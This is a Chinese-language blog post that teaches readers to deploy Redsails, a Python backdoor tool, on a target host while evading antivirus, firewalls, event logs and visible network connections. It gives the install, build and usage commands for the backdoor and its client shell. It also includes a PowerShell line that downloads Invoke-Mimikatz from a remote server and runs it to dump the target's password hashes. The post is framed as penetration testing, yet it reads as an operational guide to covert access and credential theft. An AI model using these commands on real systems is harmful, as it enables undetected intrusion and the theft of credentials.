超級隱蔽之後門技巧

FLy_鵬程萬里發表於2018-05-23

前言

在我們以往的滲透測試中,經常會遇到目標存在殺軟,防火牆等防護軟體的情況,導致我們的連線不穩定以及連線中斷等情況,今天就教大家如何悄無聲息的繞過層層防護開啟一個愉快的滲透之旅,請抓緊坐好,準備開車了。

Redsails是使用python開發的一款後滲透測試工具,其目的是可以使我們在目標主機上執行命令且無需建立任何事件日誌以及網路連線,詳細作用如下:

  • 在目標主機持續建立連線

  • 繞過許多常見的事件日誌

  • 產生虛假日誌/網路流量

Redsails依賴於PyDivertPycrypto和WinDivert包,我們可以使用以下命令進行安裝:

pip install pydivert
pip install pbkdf2
easy_install pycrypto

在安裝pycrypto之前,還需要Microsoft Visual C ++編譯器。

建立可執行檔案

pip install pyinstaller

pyinstaller-script.py -F --clean redSails.spec

用法

在目標主機上執行:

redsails.exe -a <IP Address> -p <password> -o <port>

在本地進行監聽,使用相同的密碼就可以獲得一個shell

python redsailsClient.py -t <IP Address> -p <password> -o <port>

這時候神奇的事情發生了,我們看到shell已經連線成功,但是並未建立新的連線,連線埠也一直處於監聽狀態。而更加神奇的是即使目標主機上並未開放我們的連線埠,我們也可以正常進行連線,並且不會建立新的連線。



如圖,我們使用了22埠進行了連線,但是在目標主機上並未開放22埠,並且也沒有任何關於22埠的連線資訊。連線成功之後,我們便可以通過redsails控制檯在目標主機上執行系統命令了,執行命令方法如下:

SHELL::net users
SHELL::whoami
SHELL::ipconfig

Redsails也支援PowerShell,因此它可以執行PowerShell命令。


例如我們想對目標的hash進行抓取,我們可以這樣呼叫Powershell指令碼來執行:

PSHELL::IEX(New-Object Net.WebClient).Downloadstring('http://192.168.100.2/tmp/Invoke-Mimikatz.ps1');Invoke-Mimikatz

也可以利用powershellMetasploit進行互動,不過這樣就會建立一個新的連線,容易被防護系統檢測到。

相關文章